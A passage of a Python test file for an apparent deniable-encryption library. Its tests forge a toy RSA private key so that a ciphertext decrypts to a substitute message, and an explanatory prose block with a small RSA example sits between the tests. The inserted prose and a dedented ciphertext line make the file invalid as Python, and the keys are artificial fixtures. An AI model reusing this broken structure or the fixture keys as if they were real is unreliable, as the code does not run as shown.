    sec = """-----BEGIN RSA PRIVATE KEY-----
MDECAQACBghK5FNUlwIDAQABAgYCIgDwCMECAyqx9QIDMbjbAgMWsskCAwX2/QID
D3n/
-----END RSA PRIVATE KEY-----"""
    mes1 = "bar"
    sec_d = collision_finder(mes1, cipher, sec)
    assert sec_d == """-----BEGIN RSA PRIVATE KEY-----
MDQCAQACBghK5FNUlwIDAQABAgkFck+wk/ieerACAyqx9QIDMbjbAgMkY0QCAypP
7gIDD3n/
-----END RSA PRIVATE KEY-----"""


def test_decrypt_message_denied():
    """Can we properly decrypt a denied message?"""
    cipher = "7928186168759"
    sec = """-----BEGIN RSA PRIVATE KEY-----
MDQCAQACBghK5FNUlwIDAQABAgkFck+wk/ieerACAyqx9QIDMbjbAgMkY0QCAypP
7gIDD3n/
-----END RSA PRIVATE KEY-----"""
    mes = decryption(cipher, sec)
    assert mes == "bar"
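The pair of tests above hinges on a property of textbook RSA: any exponent maps a ciphertext to *some* plaintext, so a forged private key can embed an exponent whose output is the message one wants to claim was sent. A toy illustration with the classic small-number RSA example (`d_fake` is a hypothetical forged exponent; this is not the library's actual collision-search algorithm):

```python
# Classic toy RSA parameters: n = 61 * 53, public exponent e, private d.
n, e, d = 3233, 17, 2753
real = 65
cipher = pow(real, e, n)          # encrypt the real message

# Any exponent decrypts the ciphertext to *some* value; a forged key
# simply embeds an exponent whose output is the message to be claimed.
d_fake = 5                        # hypothetical forged exponent
fake = pow(cipher, d_fake, n)     # the "denied" plaintext

assert pow(cipher, d, n) == real  # the real key recovers the real message
assert fake != real               # the forged key yields a different one
```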
def test_deny_message():
    """Can we properly deny a message?"""
cipher = "0074030300600190011378907651800045698414404470080030385682090109123670224050120531998818630137288902553010155663489030830127381931856590160898464413660020322166430310048244557250210044133803767040040290746414460070702442009090029457908915500160345319957900047285600018140085097023608950095978444421310044900084038040103807483901170029323906225240167223519095820002079519289710104914885463730060930745856210151746821788720017147665188580018516857501390156436912879390076626036258410033285379599160045282270242180119608242392880160072595973620094401365443920098816906812220023652782668030015003819281530085315025863930018516857501390124245140480160110829919693620021982984938300072954025435370102862001585060140250949250870118619984929080128558910439210133857779649260142492869577500038761826674910044179308607860077368148705770081719736248230003431069555900027990067232510126815227374330154332355079530152036196115160027467544105200147963311250840015479256234880116900204680810051088496873640072408595512430004897402357540067051714325890123169908941570126479572458720144770098274160057962449750350086562156823410074219337068890048720690063500020268644415620048244557250210152705908453250123169908941570093078227929230076323145437370154147962231610015501263640500141892598670950159309800353280104279383887560071461639445820092195875233940111477336650040038473404215190099657575510870009646342806250138424987912390159162720836430123169908941570162747269484220029603748764090060026278241700003431069555900150720851534910057807295627840058261185711110135792259683560020322166430310143654251673520043738054104590013342937439130001575022454480036455520882980154594048752730095276882889310063254737123650030359460922320011150227107460085742274997420013342937439130051854890082370053495095552440023092009360440132455982266060006843003900340086562156823410051847315396350062451106035490097462740890640085742274997420018628490804470013100715264390094007335169620132455982266060001366248481210130462285
27818006997949523415003770597647738007437972557067012647957245872007940372968177009597844442131002799006723251012681522737433015433235507953007421933706889014540473902830013707691507583010317061096171012688784624763010762736078482000731503586345014376526096303016249079904860005128193188355004254754985104003000194950230014422929915482013728890255301001629198308243001550126364050006281914246775015355624429676015751920708194009440136544392006093074585621000752074324847005454201888189011573908551276004522173090266009965817114683002539364836481007437972557067004177563013608008460085447165007018203479960009548057291938010164971342265012694198741885012647957245872015203619611516000256812554306001500381928153008531502586393001851685750139011881906947105005209206665186000818931450462001722417303484002989032389588002761406861735002177118469101009440136544392004177563013608008460085447165002809163746052007437022137701009597844442131015355624429676014634277840369009966023315029005843175641446004824455725021004413380376704004029074641446007070244200909001500381928153008531502586393001851685750139004310267653089012709477283164014418434384432008047295315964011541672909362008812048037634004129274894439000818931450462014834287099849008982118705813000241311888427011973650000418013361565869562011558331826258014025094925087000845715302918007793623876375002176739558019003035946092232004310267653089016033740574045008531502586393009455173853522013078413128169009195627893939015174682178872010520847887165008047295315964002606370355183012919833141506000517439375931013235212845639013245598226606008423789730310005454201888189011973650000418014932754446813013893830472615004755851510998015255300392354015565062282726014397434916727013391467722495000157502245448004353506569150004333539867151001700947636903008167647662251015930980035328006093074585621015174682178872015459404875273009527688288931006325473712365000838491097119011294916763411000134071827562014397434916727006730803715277002715070217111
00043597654901501544288600886800843817174903300268599210913001527081817842301587817495374900081893145046201675938226680600203221664303101141678075507501254700394242401489403245893001041179679887801554702055590900441793086078600687888286223501114179097989500681874101571500961967918846000875330257907301535050448225100185168575013900219829849383000812246962301100741402586934001485147377661200185168575013900909989313546500004692668326900460187500342101120652525045700298903238958801672235190958201675938226680600449982914570001095406555384700939183300233900996575755108700860637262964300178197645915800931421401422600447367425012600150626828498701630929741028800303316881346301535050448225100185168575013900406551205357200367733112613300715495763002400336783868272400339421812363801654197036860201007517338312300307623582225501356307218710700855177808492701338698133603400279900672325101273819318565901242451404801601108299196936200975323677823500919562789393901517468217887200128123521054900856576665865700965531702562801313710834757600804729531596401517468217887200336783868272400339421812363801654197036860201438274608369000985778754772900762121975194000501251182573600552684965085301006744972845000914447367500900988169068122200526711694146401164737370095001283052504118700766260362584100066404497751300474806725923901614065563301500924434495966800429694926273500094198558471501421239884468101275199383969000658331248283500544642778869300404840386635001436542516735200437380541045900133429374391301015119129618700177055035980400894913070287101381170776337500486407911714101328299696186900053171009143101283052504118700766260362584100066404497751300474806725923900701820347996000111470138126000262055450945700086840925525001656734087197500894913070287101381170776337500486407911714101520361961151600025681255430601450838483522800930782279292300763231454373700705631834325100253936483648100743797255706701545940487527301155833182625800632547371236500342323733073201290090244961000914447367500901324
55982266060001366248481210130462285278180036684354385070076212197519400037110151174550040655120535720036773311261330154341686695650072954025435370102862001585060126422852818250132038605478480167088616027300058261185711110166744691657030020994789819530017147665188580152325194551710060930745856210024650711701340074365772742190133335072553140141665003656500099660233150290058431756414460137945791887380133914677224950134934113764240056690282909770004386584418390005438641047680003608190853250037628856599350063917416242990141665003656500080800319198950000365765580810001170979874400081146421987840016291983082430153585233409300111417909798950143424650652710162802838376910091956278939390132038605478480082254944008870089185909371470011150227107460085742274997420157902714656570089491307028710138117077633750048640791171410049856207202150051377035688640085742274997420129512913844960068484049772270066588338772980146342778403690122832531645630133914677224950048244557250210013216278655590154594048752730020354134840520138295330222750102221064784340008457153029180077936238763750150627611625610062006802281160069305152056180072954025435370102862001585060119736500004180105228697938940148435860059040133729944162500148514737766120082206286710020030776120476150095480572919380126144693522290090449117556640141892598670950064208947934180143654251673520043738054104590013342937439130141775166876460039639288324780154147962231610165673408719750153556244296760157519207081940031472975166100029890323895880065088342146580085657666586570050125118257360055268496508530132038605478480127094772831640124559205721760040069279363380089024680448790015537373741240072408595512430030811917263810076361509342240105208478871650080800319198950138873342304210042890122798430126841925351430151034025856990148892733550080095978444421310116443536534670001170979874400139134620908970145486197908330011672817393010122632853892540092397305118190103542566085610153556244296760143406105599210004897402357540043382869720570094007335
16962014092572874965001309091884982011051528056075011468509746186016467672311516006325473712365008780483730292005312777835626011836434905078000964634280625004867927189353003827679989672006740770767002001687137217044012694198741885006325473712365011277532319817004551506953744000974062963904008015565098391008606372629643001781976459158014166500365650004569841440447008297261991690002617676767815016750580417555002761406861735012954769689258012670191470354014007091149370015916272083643014894032458930012954769689258012670191470354008015565098391000964634280625002176739558019016567340871975005012511825736005526849650853010067449728450009144473675009014342465065271016280283837691001500381928153008531502586393001851685750139010659817137036008047295315964000662114234670014448481175886005395910800602002032216643031011449390577186008047295315964002606370355183002026864441562007456034786524007456034786524009655317025628013137108347576008047295315964015174682178872001452657707862003847340421519013919718206350000940132202926007486339241401014829338048339015174682178872001167281739301004006927936338007662603625841012939859141731002304971496047011861998492908001851685750139012721974023243009196212734568001747076301974004198556140857000134071827562006726663636796003580878865616016007259597362006333401836156010317061096171014233066358253016542257322404007147612444061013391467722495007437972557067001221652901140003394218123638012293672137519009164337938618008574227499742013794579188738011541672909362014843586005904001483082016100006069472226690002191926147728002685992109130004924046834930016254215163943010727962260371009098704048083007433653413508007940372968177003330404329357001770550359804000343106955590011501462214276003134690610872012316990894157004490008403804010380748390117003460857216688013422477074954006953173326347004987461741254015930980035328012634375765651006540764528130005042315731923003738932137370012738193185659014234502908188015433235507953008400789531718008853987555337
00257098672259301543323550795300674077076700200510884968736400724085955124301297552222729301593586799087801507208515349100578072956278400582611857111100298903238958801657594688833700059144599827801454861979083301425162646882600202686444156200235895970664700020130453751001369563298498501481207874066400474806725923901614065563301500924434495966800154792562348801006966621049600660784641023300417756301360800846008544716501164737370095000434115573333600714761244406101309275114856100042872793889000206076673721701418925986709501372788283574301540115086130200632547371236501392127161226100432400235583200693605899757400388705407109501662407496425101554702055590900627792005287301667446916570300209947898195300865621568234101494833438066100804613949771300336783868272400339421812363801654197036860200996575755108700565427820934800441494260820700624511060354900790952107870001146850974618600566902829097700458141062700300491521545786400855177808492701517468217887200501251182573601396488578660600512819318835500371782683324201338577796492601654197036860200106683876854501535562442967600837425905726201245592057217600400692793633800185168575013901015138344328600202686444156201421239884468101275199383969000658331248283500846008544716500542111729587601624837286533800141355232762200683905058395500376288565993500801556509839100329413761605101287194568096000609307458562101517468217887200609307458562100693228194992201370769150758301339146772249500563155575653601338698133603400373019448880401424928695775000769305885604501313773226184000485979780858701434246506527101628028383769100804613949771300049682769446800295386756907100884123162560900398897197621001454861979083301264795724587200181781168968601412798843294401333350725531401556707604062801273819318565901608984644136601052084788716500804729531596400260637035518300202686444156200919562789393901517468217887200086840925525000719216779070701527081817842301587817495374900081893145046201004678193901101242451404801600977125554296300096463428062500481
56107119900090263999802780027242296153540001340718275620091956278939390151746821788720020322166430310026684122573430111398406003720132352128456390047480672592390074628307998910080030385682090109123670224050082254944008870142492869577500096001513569980095149555841280141665003656500045698414404470030331688134630153505044822510018516857501390051854890082370053495095552440023092009360440124113775062560066387220058600041775630136080070182034799600145083848352280031346906108720074799350237410065833124828350101649713422650126941987418850132829969618690141665003656500074562550628000117630325661140074863392414010084600854471650154147962231610165673408719750089491307028710051281931883550160062951076570008875224642070019399341005280159358679908780050125118257360139648857866060051281931883550129398591417310112381142787690061944891541890066520247716340005914459982780133914677224950036455520882980053338198141690006529376996820073435881217550033678386827240033942181236380165419703686020149483343806610080461394977130017147665188580018516857501390133335072553140155670760406280050469571602970053959108006020002435133525200153452183739320038460135299410041599467487450029890323895880027614068617350104117967988780045698414404470042969492627350009419855847150037699978018300152272609087650124924608683760110781774935800165540547699930011259906079160121573085253620129547696892580108151491048780056338221522300107108530310950074560347865240074560347865240124638789953550005914459982780145486197908330142516264688260020268644415620111417909798950001170979874400081146421987840167593822668060134224770749540118919488513380038460135299410041599467487450137284173200570097687225511490133914677224950124245140480160121116896263330003608190853250037628856599350109411291622020074365772742190133335072553140033942181236380116900204680810036400009032370127790025424250037628856599350027990067232510126815227374330154332355079530011672817393010011450869452730129547696892580002435133525200021767395580190041563767
52029013203860547848008003038568209001483082016100009857787547729007621219751940014342465065271007384159260271008812048037634004129274894439000818931450462007515308856153002894336112277014038113860762004748067259239007018203479960009548057291938014234502908188015433235507953008574227499742014234502908188015433235507953008400789531718006839050583955003761609311211012951291384496004338286972057010192012697117006806986522052001195493477279013405772405262013046228527818005012511825736001017559616880011468509746186005669028290977011891948851338009966023315029005843175641446010151191296187001770550359804009400733516962011929411332904011078177493580011573908551276001321627865559013282996961869001580742474337004338286972057004216676352889014166500365650004569841440447015168119443819010762736078482011988293397496008066205237367000829564869512000117097987440008114642198784001629198308243006341644602570000243513352520015062761162561012738193185659016089846441366002344198049556011528033426514008036575453063003134690610872012316990894157010075173383123003076235822255009521880009982001367280283756013391467722495016657748874725006638722005860003711015117455006540764528130014932754446813002358959706647000201304537510013695632984985002026864441562000088949644833012835381745534015414796223161002700521725932015086348926604015255300392354009466371776926001334293743913016657748874725006638722005860012779002542425003762885659935004490008403804004358448343168015071510897841001939934100528008080031919895000036576558081005012511825736005526849650853010067449728450009144473675009015459404875273013811707763375011748992574776015414796223161015323824963883004743407085044003580878865616015174682178872009655317025628013137108347576008047295315964015174682178872006093074585621015174682178872013245598226606008423789730310005454201888189011973650000418001367280283756007904380352052012614469352229009044911755664004417930860786014843586005904006198995976081000964634280625010844138834255002191926147728
00034310695559001545940487527300952768828893101532356652341200289433611227701403811386076200965531702562801313710834757600804729531596401517468217887200433353986715101532382496388300474340708504400358087886561601517468217887200563382215223000795927465285001534521837393200384601352994100415994674874500501251182573601164586663421000217673955801900303594609223200431026765308901675938226680600582611857111101494833438066100804613949771301382953302227501123811427876900619448915418900148308201610001193614377133200898211870581300024131188842701293985914173100203221664303100891859093714700111502271074600857422749974201563273892251900449048430917000853150258639301295775335851101479633112508401291674042162201196333064450701441747320731600154792562348801191897760568200457101385444001155897797229100870164240896200586660591519401627472694842200168713721704400498718290803301545940487527301155833182625801114773366500400856576665865700684840497722701292232106696800059144599827801339146772249500975323677823500743657727421901339146772249501436542516735200437380541045900133429374391301441747320731601400709114937000808003191989500003657655808100029421655869001052198714569901367453730491800217673955801901656734087197501264795724587201527081817842301587817495374900081893145046200588860875182800762121975194000684840497722701292232106696800059144599827801339146772249500196320034425000555376730180301545940487527301028083608835601582103224661001586227263589401264228528182500975323677823501295129138449600433828697205700458141062700301624907990486001062945307052801543416866956500398038628956300206387364822700989509417126300101755961688000049639193179800279900672325101268152273743301543323550795300988169068122200236527826680301436542516735200437380541045900133429374391301654197036860201339146772249500769305885604501313773226184000485979780858700298903238958801672235190958200162919830824301532382496388300474340708504400358087886561601517468217887201326367130707001617472228491400978996573543400894
91307028710081719736248230152365046083840164870872307820147980503904370150627611625610124559205721760074628307998910129398591417310157779395689870103170610961710129398591417310023049714960470102862001585060033044879477240075116146587200042967687750510154341686695650142492869577500091444736750090160345319957900094663717769260128305250411870084918559580080068390505839550037628856599350132455982266060084237897303100054542018881890044900084038040021286283394010018516857501390053810272736940018516857501390038761826674910062779200528730050423157319230037389321373700127381931856590043102676530890155670760406280062006802281160069305152056180053039943180160068187410157150093275523557280160062951076570005914459982780145486197908330142516264688260020268644415620091444736750090160345319957900068484049772270053834755330410034169568739650093142140142260048720690063500020268644415620043102676530890014885148439620140250949250870034608572166880155670760406280148514737766120082206286710020030776120476150105869191127490068788828622350111417909798950067768263047720106039415393760125292976555660033942181236380161365276515610132352128456390095968918798530090036400803050050125118257360003135737413050108708757939010088120480376340041292748944390008189314504620095676970944280098577875477290076212197519400126479572458720018178116896860141279884329440129512913844960160072595973620081676476622510048244557250210025373291277170145486197908330085742274997420047558515109980152553003923540143827460836900098577875477290076212197519400126479572458720056338221522300107108530310950143654251673520043738054104590013342937439130054464277886930040484038663500001575022454480036455520882980166744691657030109785138051050005557931091030058886087518280085517780849270029890323895880097166186319690068453843909640100129276545440003608190853250037616093112110166577488747250066387220058600093078227929230094578765333050037301944888040141775166876460039639288324780050770921965010141665003656500137076915075830133914677
22495013727882835743015401150861302012642285281825006705171432589012316990894157010427938388756007146163944582009219587523394012939859141731013757940052320004028109888582012939859141731011238114278769006194489154189006198995976081008606372629643001781976459158015777939568987005454201888189006093074585621009521880009982009026399980278002724229615354007458986740984006839050583955003761609311211007909521078700011468509746186005669028290977003134690610872012316990894157003367838682724003394218123638016541970368602015203619611516000256812554306013727882835743015401150861302013706924885143004872069006350002026864441562011141790979895009400733516962000438658441839000105892940668009595266221953008163511193078015952562974741013391467722495004006927936338007786565736240014253581144725015071510897841004551506953744013391467722495001334293743913006397704065117012424514048016004748067259239016006295107657005605409939805009527688288931014548619790833008949130702871012954769689258012642285281825001558473447668000507787353453007070244200909003189989158065009044911755664015255300392354003184180715168006325473712365001700947636903008167647662251007295402543537010286200158506003717826833242003827679989672006740770767002001687137217044013333507255314003394218123638013187476462667012283253164563012957753358511005242975109009014798050390437007018203479960004824455725021004413380376704004029074641446007070244200909015790271465657007940372968177002894086108070000394168414697015271096017996013245598226606000136624848121013046228527818004490008403804010380748390117006806986522052011918977605682004571013854440014422929915482013235212845639003367838682724003394218123638016541970368602013919718206350000940132202926004490484309170008047295315964002606370355183012919833141506011777314050870005383475533041003416956873965009314214014226004872069006350002026864441562009195627893939013203860547848013076962562409007240859551243002809163746052006652024771634001367280283756011541672909362006002627824170
01192941133290401107817749358001150146221427601545940487527301381170776337501174899257477601309275114856101608984644136601224646884541001318747646266701295476968925801447700982741600579624497503500796560484928800912604313568301489403245893000556791161388500124694905223900766260362584100632547371236500415637675202901320386054784801094112916220201152803342651400803657545306300504231573192300373893213737001273819318565900538102727369400185168575013900219829849383000790952107870001146850974618600566902829097700412858598452401196333064450700870164240896200586660591519401545940487527300952768828893101293985914173101342247707495400702532846784700108863458084701550541272748601123811427876900619448915418900436651064326200898211870581300822062867100200270616550086601155485374752200114508694527301295476968925800024351335252000364000090323700234419804955600088752246420701293985914173100230497149604700214333749038400745625506280001176303256611401370692488514300495836789564300398698935383000890246804487900884123162560900398897197621001454861979083300946637177692601283052504118700693605899757400215387768345300298903238958800217711846910100314729751661001556506228272601439743491672701339146772249500482445572502101527059084532501231699089415700959689187985300900364008030501150146221427600474806725923900715538351531500600262782417001382202692452900790438035205201086971604133000259575700246101015138344328600202686444156200431026765308901113984060037201323521284563900298903238958801672235190958201423306635825300452822702421801196082423928801015435650211800904878357078500154792562348801356307218710701480634062030200816764766225100804729531596401339146772249500124694905223900745603478652401391971820635000094013220292600632547371236501532382496388300474340708504400358087886561601517468217887200865621568234100518473153963500624511060354901563273892251901293985914173100582611857111100504231573192300373893213737001273819318565901423450290818801543323550795300857422749974201114179097989500066
21142346700144484811758860053959108006020023049714960470072408595512430154147962231610015501263640500141892598670950021982984938300038870540710950065381530795400044736742501260015062682849870163092974102880082254944008870072954025435370102862001585060129398591417310044998291457000094007335169620138295330222750092958385174230042547549851040070702442009090026684122573430008684092552500139023790378820088200887019740097899657354340054019415175060054542018881890093899695642700134057724052620130462285278180037110151174550088198833596790025386612855800020060886561110142345029081880154332355079530085742274997420080461394977130004968276944680127381931856590038761826674910044179308607860148435860059040166498169789520103170610961710033285379599160068453843909640126422852818250090998931354650000469266832690017147665188580018516857501390156436912879390076626036258410074863392414010143765260963030166744691657030128251519817810110822774750140065833124828350126941987418850100129276545440159319859031070081719736248230115014622142760079656048492880020703674731150085742274997420081224696230110020604806054100145083848352280095968918798530054669018822090133519900294010020862054147490129577533585110147963311250840109411291622020085315025863930094551738535220130784131281690015003819281530085315025863930018516857501390124245140480160110829919693620021982984938300048244557250210013216278655590158210322466100158622726358940160062951076570115280334265140080365754530630033678386827240033942181236380165419703686020068484049772270005914459982780145486197908330142516264688260020268644415620147394209643760033584472091080147061717043400166589750959580003431069555900066828634445540106518046891300129167404216220013672802837560143443173166000139324923425010034608572166880118853722823780040655120535720036773311261330154341686695650133335072553140020322166430310156327389225190037178268332420038276799896720067407707670020016871372170440038870540710950029665665779300153505044822510018516857501390142492869
57750014355483448889012663683485654015323824963883004743407085044003580878865616015174682178872009466371776926001334293743913009789965735434005401941517506015797328196975012476425810350011461672507016004872069006350002026864441562012614469352229009044911755664004417930860786005242975109009014798050390437007018203479960007146163944582007793623876375015174682178872007940372968177009597844442131009400733516962006776826304772010603941539376012529297655566002304971496047002539364836481007437972557067001221652901140002842841761200006652024771634015350504482251001851685750139001334293743913009746274089064008574227499742014177516687646003963928832478011449390577186009026399980278002724229615354000134071827562015632738922519012246468845410000117097987440008114642198784001629198308243009210844721013009548057291938009144473675009016034531995790015459404875273002035413484052013282996961869011918977605682004571013854440011268036256090009307822792923009457876533305013221752803914008551778084927012463878995355008531502586393012975522227293008080031919895000036576558081002799006723251002953867569071010048965659771006936058997574009789965735434015345218373932004569841440447008225494400887014209570195638001017559616880004228139006388008551778084927015072085153491005780729562784005826118571111008949130702871013811707763375004864079117141005485918380367003762885659935009385354295251016039192809393016759382266806015567076040628006200680228116007369790830417011554853747522001145086945273012954769689258000243513352520010844138834255000926601854884008684349755031015270818178423015878174953749000818931450462006573337491836015916272083643012642285281825014508384835228010222196118294008338047702420007562255279085015203619611516000256812554306009195627893939013203860547848001547925623488006997949523415012830525041187007662603625841000664044977513002799006723251012738193185659007613702018843009655317025628013137108347576008047295315964015174682178872003711015117455005631555756536013386981336034
01066472795746400277699294950701007517338312300307623582225500693228194992200384601352994100415994674874500544471192471701177353896955801114773366500400384734042151900548591838036700230497149604701028620015850600330448794772400751161465872001320386054784801394147595379100042872793889000206076673721701418925986709501072796226037100909870404808300743365341350800491521545786400855177808492701517468217887201582103224661001586227263589401293985914173100582611857111100742193370688900383866983384201339146772249500219829849383001136557393224200455150695374400097406296390400154792562348800203221664303100458826748941300822062867100200914447367500900298903238958801041179679887800456984144044700429694926273501532382496388300474340708504400358087886561601517468217887200298903238958800303316881346301535050448225100155784641778901667446916570301282515198178101108227747501400431026765308900119549347727900289433611227701403811386076200609307458562100200608865611101429243754134401304197010515800959689187985300900364008030500695317332634701234169883868001620440075537901369563298498500202686444156200482445572502100973741182193600692638602636101157390855127600132162786555900517714128042801263437576565100654076452813000029421655869001052198714569901367453730491800046637866430301593098003532800158074247433700433828697205700421667635288901556707604062800620068022811600693051520561800235895970664700020130453751001369563298498501291983314150600468092994316000185168575013901389383047261500745603478652400745603478652401264795724587201545940487527301028083608835601324559822660600013662484812101304622852781800473507408445900004692668326901274686385207500433353986715100214702329456000053171009143101441843438443201286042306074701313710834757601146850974618600566902829097701019201269711701485147377661200185168575013900974627408906400857422749974200376999780183000529381043033800278324870422800302769047558700043865844183900010589294066800710778023616900238245360019900253866128558001169002046808101084
41388342550134224770749540004386584418390090746871650460159162720836430123169908941570015807424743370043382869720570042166763528890008684092552500027005217259320150863489266040152553003923540004386584418390008127005624210073433673910240093899695642700030495631218870145486197908330085742274997420095480572919380141775166876460039639288324780025386612855800020060886561110073682840813990151423798003130098607948398360056315557565360133869813360340080253886054500038473404215190012216529011400127094772831640009646342806250065926910907760048720690063500020268644415620091444736750090160345319957900160072595973620081676476622510048244557250210152705908453250123169908941570143424650652710073841592602710033345467849170107086412910260064857523473490119736500004180109597153413270103899402221880020322166430310128604230607470097532367782350131371083475760114685097461860056690282909770162490799048600051281931883550042547549851040030001949502300115589779722910106598171370360080472953159640064470439640470106857518651120104279383887560071461639445820092195875233940044562002302630076212197519400099657575510870009646342806250065926910907760038386698338420133914677224950145083848352280127381931856590081224696230110088634898077720115280334265140080365754530630098816906812220131444283128120148435860059040027614068617350155054127274860063339766573800127381931856590160898464413660023049714960470072408595512430115488719523170099660233150290092711991513280130769625624090148514737766120018516857501390145083848352280115014622142760027990067232510029538675690710088412316256090102741988443260094663717769260013342937439130064208947934180065833124828350165419703686020133914677224950049164874497220080461394977130050423157319230037389321373700029538675690710130884750645340023589597066470017147665188580018516857501390142345029081880154332355079530085742274997420133335072553140008684092552500165673408719750093078227929230094578765333050007315035863450094401365443920124638789953550080662052373670008295648
69512003367838682724003394218123638016541970368602008949130702871005128193188355004456200230263008551778084927010192012697117009398691660373001851685750139001334293743913007735741020395012919833141506014796331125084002436586920555015433235507953010652049371002015295691249089003134690610872012316990894157008656215682341007940372968177007105784793783000177659298586011973650000418010959715341327010389940222188002032216643031010151383443286002026864441562010164971342265012694198741885013728417320057009768722551149013391467722495010151383443286014812078740664000294216558690010521987145699013674537304918014406518632478008982118705813008220628671002015434168669565016657748874725006638722005860005633822152230010710853031095002198298493830002086205414749012957753358511011554853747522001145086945273012954769689258000243513352520014253581144725008531502586393008344823607584007621219751940015203619611516010630547189100003711015117455012289488001446016187024821022000884956345795014342465065271016280283837691002982124646788004599105402852001851685750139013916249688957008841231625609003988971976210014548619790833012647957245872002799006723251012681522737433015433235507953003134690610872012316990894157010075173383123008551778084927001714766518858007018203479960006540764528130009871604932712016674469165703002099478981953003367838682724003394218123638016541970368602009307822792923009457876533305009074687165046014464879384007001865565770831012424514048016010642465867987010222196118294008338047702420007562255279085000438658441839007462830799891006325473712365001700947636903008167647662251012476425810350011980055704625004569841440447008225494400887014212398844681012751993839690006583312482835011141790979895002989032389588016708861602730013422477074954016589942521933009164337938618008574227499742007693058856045013137732261840004859797808587012779002542425003762885659935012157308525362012954769689258010815149104878012112161406646012635157211207013338584110967002799006723251012738193185659
01450838483522800518473153963500624511060354900736828408139901514237980031300986079483983600891859093714700111502271074600840078953171800855901999703901283052504118700766260362584100066404497751300796560484928800207036747311500857422749974200812246962301100214333749038400996602331502900967783805736300268599210913000560939390372800714761244406100185168575013901579027146565701042793838875600714616394458201249396505417000562119491009600600262782417000517714128042800313469061087200747993502374100658331248283500773574102039501291983314150600884123162560900398897197621001454861979083300609307458562101006966621049600898211870581300822062867100201543416866956500639770406511700274675441052000600262782417001326367130707000393576719237901290090244961000868434975503101432627616156001421239884468101549930365679300474806725923900746283079989100028817594256900684840497722700538347553304100341695687396501193614377133201577793956898700545420188818900794037296817700959784444213100449000840380401038074839011700680698652205200053171009143101245592057217600400692793633800185168575013901065981713703600804729531596400491521545786400855177808492701517468217887200677682630477201060394153937601252929765556601479085890118601076273607848200325777750243501342247707495401357922596835601193614377133200898211870581300024131188842701600629510765701483010135178500350111660339801541479622316101656734087197500279900672325100859914607239001630929741028800801556509839100266841225734300339421812363801318747646266701169002046808100659269109077600495836789564300398698935383000185168575013901136557393224200455150695374400097406296390400429694926273500044646742789501197365000041801421817069325901381170776337500517714128042801545940487527300952768828893101224646884541000677682630477201060394153937601252929765556600086840925525000719216779070700794037296817700447024166343700124694905223900766260362584101183643490507800266841225734300033822038457401622056156719401114179097989500406684497234301479805039043700133
42937439130142492869577500046114857956690092988762158020021982984938300012469490522390074560347865240100751733831230030762358222550131874764626670098577875477290070322992360670127790025424250037628856599350153556244296760144229299154820137288902553010160337405740450112890856172080086686271117570100467819390110091956278939390132038605478480053847655317570045282270242180119608242392880162747269484220016871372170440128670323784150076626036258410063254737123650027005217259320150863489266040152553003923540033678386827240033942181236380165419703686020162490799048600106294530705280154341686695650143554834488890126636834856540017009476369030081676476622510143654251673520043738054104590013342937439130012469490522390074560347865240001170979874400081146421987840100467819390110021982984938300067051714325890128305250411870092351739089350046114857956690040434854740950069019811663820123238178156280133914677224950114493905771860090263999802780027242296153540001340718275620106647279574640027769929495070124638789953550085315025863930094551738535220130784131281690071461639445820077936238763750151746821788720079403729681770095978444421310046018750034210117160707649510161747222849140070702442009090000889496448330128353817455340028091637460520144229299154820137288902553010074481681111920144184343844320113655739322420045515069537440009740629639040042969492627350040281098885820148940324589300104117967988780122832531645630133914677224950026684122573430008684092552500139023790378820088200887019740006529581721350112381142787690061944891541890066520247716340153505044822510015578464177890095968918798530090036400803050064470439640470014137898476300058666059151940098816906812220027246907838050068788828622350111417909798950094007335169620119294113329040110781774935800056093939037280071476124440610018516857501390053810272736940018516857501390013342937439130163661711181290066387220058600100751733831230085517780849270051771412804280094007335169620119294113329040110781774935800069531733263470059383713
57566016204400755379013695632984985002026864441562008046139497713000496827694468012738193185659002288718413881013629188835445006652024771634001367280283756011541672909362011570973061172008460085447165007018203479960004065512053572003677331126133007154957630024005042315731923003738932137370012738193185659012860423060747015930980035328006682863444554010651804689130004296949262735003035946092232004310267653089009567697094428006932281949922004569841440447005752208781675008565766658657006997949523415012830525041187007662603625841000664044977513009400733516962015565062282726014397434916727013391467722495010664727957464002776992949507010154356502118009048783570785010941129162202008531502586393000652958172135013422477074954009881690681222002365278266803014508384835228006447043964047001413789847630005866605915194004177563013608009440136544392015821032246610015862272635894015014663412859006607846410233013282996961869011918977605682004571013854440015751920708194008167647662251012614469352229009044911755664014189259867095006848279002196015236504608384016487087230782014798050390437010844138834255010222106478434010317061096171006325473712365015323824963883004743407085044003580878865616015174682178872013263671307070016174722284914009789965735434008949130702871008171973624823015236504608384016487087230782014798050390437015062761162561012455920572176007462830799891012939859141731015777939568987010317061096171012939859141731002304971496047010286200158506003304487947724007511614658720004296768775051015434168669565014249286957750009144473675009016034531995790009466371776926012830525041187008491855958008010048965659771006936058997574011141790979895000662114234670014448481175886005395910800602002344198049556000887522464207012642285281825002538661285580012283253164563013078413128169014417473207316009265238982138001015561940948015070027910964001558473447668002685992109130009655317025628013137108347576008047295315964015174682178872009881690681222016619828833110005242975109009014798050390437
00701820347996001242451404801600346085721668800907250933124601022219611829400833804770242000756225527908500794037296817700993855779897300929583851742300425475498510400707024420090901114179097989501539208094321601543323550795301065204937100201273819318565900714616394458200779362387637501517468217887201520361961151600274675441052000051743937593101323521284563900512349826042900472856000181400035846428646400745603478652400745603478652401545940487527301381170776337501174899257477600048974023575400736828408139901514237980031300986079483983600208620541474901307841312816900431026765308900203221664303100804613949771300049682769446801273819318565900812246962301100450410135090000044646742789501600629510765701128908561720800866862711175701355609873732401543323550795301065204937100201273819318565900538102727369400185168575013900658331248283501349341137642400566902829097701215730852536201238940303619501424928695775001292743989181200096463428062500049639193179801507208515349100088495634579501285589104392100513770356886401049316065429300086840925525000155012636405001418925986709501450838483522800965531702562801313710834757600804729531596401517468217887201447700982741600579624497503500412858598452400257098672259301543323550795300674077076700200486792718935300513770356886400857422749974200812246962301100680698652205201318747646266701228325316456301307841312816901372788283574301540115086130200632547371236500771645289427600804729531596400681874101571500961967918846000956769709442800985778754772900703229923606701042793838875600628191424677500990717899372700433828697205700433353986715100270052172593201508634892660401525530039235400073567843069200746283079989101600629510765700088752246420701293985914173100561629038935100219192614772801667446916570300209947898195300548591838036700339421812363800985778754772900762121975194001157390855127600132162786555900501251182573600101755961688001146850974618600566902829097700222832624603401095971534132701084413883425500092660185488400868434975503100930
